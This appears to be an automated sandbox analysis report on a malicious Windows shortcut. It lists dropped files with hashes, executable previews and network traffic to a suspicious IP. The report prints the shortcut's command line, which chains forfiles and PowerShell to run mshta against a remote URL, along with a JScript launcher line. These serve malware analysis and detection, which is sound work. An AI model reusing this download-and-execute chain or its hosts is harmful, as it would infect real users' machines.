                                                                    SSDEEP:3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5yKXW/Zi+0/RaMl85uWAX+aJp6/h4EkD5yn:RiJbNHCwWDaJ0/hJkDrXW/Zz0tl8wWDH
                                                                    MD5:633E34C077F6828A474217CE7DE57BED
                                                                    SHA1:6C7EF480F22DE38D9EDF82EF35C4F5943540E164
                                                                    SHA-256:FE9F225D70AC67046F622C2F52E17CB8CEDD111F51AEAA17C5ADBE48846E21AF
                                                                    SHA-512:358C0EBBA88DA82FCDDE3D1C518C559DADBA02E7D5935A5D12BBC5D1463A8BA094FC2AD186CDE82316010E1C4C5E18C2314C4FED70DB433C39C8FF3015577995
                                                                    Malicious:true
                                                                    Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PDF document, version 1.3, 3 pages
                                                                    Category:dropped
                                                                    Size (bytes):3986
                                                                    Entropy (8bit):7.456004459274474
                                                                    Encrypted:false
                                                                    SSDEEP:96:6RHrsQ6Fc+YDxP8gpOwEBdOujxeB7knVQzWKB5Y+74C0sLJRSo:6trcPYDigiBdfetAMxm8BPRSo
                                                                    MD5:F1D1BF7BA473B16F95B0BAFE0E09A402
                                                                    SHA1:33CBC0601595EC233C96D8181D12CEAE9CEECE7A
                                                                    SHA-256:CFBACCD2CC5E9FCE35F05E87D7F5D8DF85CA47ECF0E8FDC44CFB701A70EB0DFE
                                                                    SHA-512:559918229442151AF1C1C48D55052BC94BB28E664CE5190B40BF0CE10A3381F1D9773F3FC4E1848CB7A5E34DE4279533E64F667F58F473DB61C824E861CF6F90
                                                                    Malicious:false
                                                                    Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 879>>.stream.x.}TM..:...+..U...?...P..+.(H...bO....$%..{f.8N..'.F...3...*.e..W..x.1...I...|X.4iD.B.".a.../f@0+....{.^9...(.Tk....k..4Hx4.U........3H..#.U.."..H...V$.k....HO ]... .....X.J<.......{...^&V.5|..:....z:....j2.7. .n.....=QA......ai..<H....|...#?.]............H...W%Y..{.k....CY)Xg>$....v.b.+c.o....),.6.E........>..>.Rk..~..n.I...].k........V...G.d...B..v.Ri......Or.....E*)sylC.....${.v.\ .*.**.\...#..a&pP~.Q.G92..WJ#t.Pf.....,.]..n..)../.a0...<.$...a..|&...O.Y-....N.=..R..3M.&D..a...j....>!..ZJ..G.c...yc..x.....7w......d.E.....j....|.E&.X.Q.,J>..)......7.%Z...9u....K7...\u.#FA..l.......C.@...N..^.e]dM).8}...|.cV...3....>..V....ufq....r..w-....,HU]..e.h.. .4.....8j....c.....?..L.t.c.f..i..$.{..I".vRc..[..\.............v..]..^.<MKQL..+......4...v...I\..6 ..H.........t...............^n.!O.\..>.o./.QW'....~.
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):99
                                                                    Entropy (8bit):4.9306597478632
                                                                    Encrypted:false
                                                                    SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5yKXW/Zi+URAAy:HRYF5yjo923yKXW/Zzyy
                                                                    MD5:EF6AD112185745A629FB60A8A2678649
                                                                    SHA1:500391A0E969362BFA1DFE7A116A9395E29D29DA
                                                                    SHA-256:14555F0A16F710F533606B316DE7765634F60BD9FC5D1946D80EAA29104ACAF9
                                                                    SHA-512:2F3E1A025E02EB111BB3E9F6E1CCEE3AD3A7A7BC90C0DF7D0C4ECD90BA7792A5D3C361113423BC9ED035FCA77EA5B9870AD1B648E1A86E717F7D29672699176D
                                                                    Malicious:true
                                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1083904
                                                                    Entropy (8bit):6.306473619816267
                                                                    Encrypted:false
                                                                    SSDEEP:24576:DrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaB1T:D2EYTb8atv1orq+pEiSDTj1VyvBa3
                                                                    MD5:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                    SHA1:4C4FDEA73E0C98C2C82B6B1232EF7ECF5B99CCD1
                                                                    SHA-256:F1140750BA9FEAD0EF27B715D1BB2AE28864FE611068759F8EF4F8364AF559CB
                                                                    SHA-512:84C3A61A1F7A71E52DFE110CD975F6DA7EA0B2A83FA16F7B46C223ADE7B44D1F299BF0C108268502F144F5C93E0A74AB37B13D24B9540355658119768BF12C2A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d....^g.........."......4...R.......T.........@....................................qR....`...@...............@..............................\..|........@...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....@.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 10:07:21 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                                                                    Entropy (8bit):4.62209593153277
                                                                    TrID:
                                                                    • Windows Shortcut (20020/1) 100.00%
                                                                    File name:duyba.lnk.download.lnk
                                                                    File size:1'146 bytes
                                                                    MD5:afc9a2ec3804784e238beba0fb861346
                                                                    SHA1:fcf72ba6b5031b3cde13b6e09480f467bfcde1a0
                                                                    SHA256:e3b166a6a0bb2f3041367773c47e195224a65e4bc6fb5b8e69a6e2309db055c3
                                                                    SHA512:f2642fefeb287611a803550a81304fd604b872594385289cdd7c8df11937a9a2e874c1c88c3a3780f21b6577e2819d4303b06a7e9ed7405572d83245eeb7525c
                                                                    SSDEEP:24:8+fY3sn+hpyAMkA+/44+4MlEPSL6w4aFacabqyI+pu4m:8z3zF/MlEQ6v+acaey3w4
                                                                    TLSH:A121CE0823D90774C376AE39683AF301CA717D86EC638F1E05D006886495111B8A6FBA
                                                                    File Content Preview:L..................F.... ...........!kR..N..................................E....P.O. .:i.....+00.../C:\...................V.1......YI...Windows.@........OwH.Yy\....(.....................R3..W.i.n.d.o.w.s.....Z.1......Y....System32..B........OwH.Y.X......
                                                                    Icon Hash:74f0e4e4e4e1e1ed

                                                                    General

                                                                    Relative Path:..\..\..\..\Windows\System32\forfiles.exe
                                                                    Command Line Argument:/p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
                                                                    Icon location:shell32.dll
                                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                    2024-12-18T09:13:05.458082+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49707 | 147.45.49.155 | 80 | TCP

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 18, 2024 09:13:06.052938938 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.052984953 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.053020000 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.055510998 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.055555105 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.055562019 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.057986975 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.058053017 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.058092117 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.060548067 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.060590029 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.060595036 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.063100100 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.063152075 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.063232899 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.065763950 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.065819025 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.065820932 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.068116903 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.068156004 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.068245888 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.070631027 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.070683002 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.070743084 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.073205948 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.073249102 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.073288918 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.075819016 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.075881958 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.075910091 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.078147888 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.078264952 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.078268051 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.080593109 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.080668926 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.080745935 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.082921982 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.082967997 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.083014965 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.085253000 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.085303068 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.085309982 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.087219000 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.087275982 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.087348938 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.089241028 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.089288950 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.089314938 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.091092110 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.091223955 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.091252089 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.093100071 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.093144894 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.093313932 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.095189095 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.095213890 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.095257044 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.096972942 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.096990108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.097018003 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.098875046 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.099061966 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.099104881 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.100826979 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.100862026 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.100869894 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.140211105 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.140259981 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.140348911 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.140780926 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.140827894 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.141216040 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.142750025 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.142836094 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.142853022 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.144665956 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.144735098 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.144736052 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.146641016 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.146699905 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.146891117 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.148550034 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.148596048 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.148600101 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.150497913 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.150557995 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.150589943 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.152431011 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.152544975 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.152668953 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.154400110 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.154448986 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.154464006 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.156297922 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.156384945 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.156434059 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.181586981 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.181646109 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.181663036 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.182447910 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.182549953 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.182594061 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.184406996 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.184451103 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.185100079 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.185203075 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.185321093 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.187024117 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.187131882 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.187177896 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.188958883 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.221649885 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.221704006 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.221751928 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.222376108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.222418070 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.222570896 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.223768950 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.223815918 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.223905087 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.225193024 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.225245953 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.225290060 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.226680994 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.226732969 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.226758957 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.228111029 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.228189945 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.228224039 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.229552031 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.229634047 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.229645014 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.231030941 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.231075048 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.231108904 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.232420921 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.232469082 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.232592106 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.233817101 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.233910084 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.233925104 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.235249043 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.235291004 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.235299110 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.236685991 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.236731052 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.236771107 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.238157988 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.238209009 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.238321066 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.239602089 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.239645958 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.239646912 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.240993977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.241035938 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.241091013 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.242439985 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.242487907 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.242553949 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.243885994 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.243932962 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.244076967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.245320082 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.245371103 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.245410919 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.246762991 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.246810913 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.246850967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.248172998 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.248229980 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.248289108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.249701977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.249744892 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.249749899 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.251025915 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.251089096 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.251174927 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.252496004 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.252549887 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.252610922 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.253993988 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.254127026 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.254158020 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.255367041 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.255417109 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.255486965 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.256814003 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.256899118 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.256947041 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.258343935 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.258407116 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.258454084 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.259735107 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.259836912 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.259869099 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.261104107 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.261148930 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.261240959 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.262531996 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.262576103 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.262629986 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.263994932 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.264101982 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.264127016 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.265402079 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.265445948 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.265486956 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.266829014 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.614950895 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.615777969 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.615833998 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.615921021 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.616709948 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.616765022 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.616847038 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.617633104 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.617681980 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.617743969 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.618547916 CET8049707147.45.49.155192.168.2.5
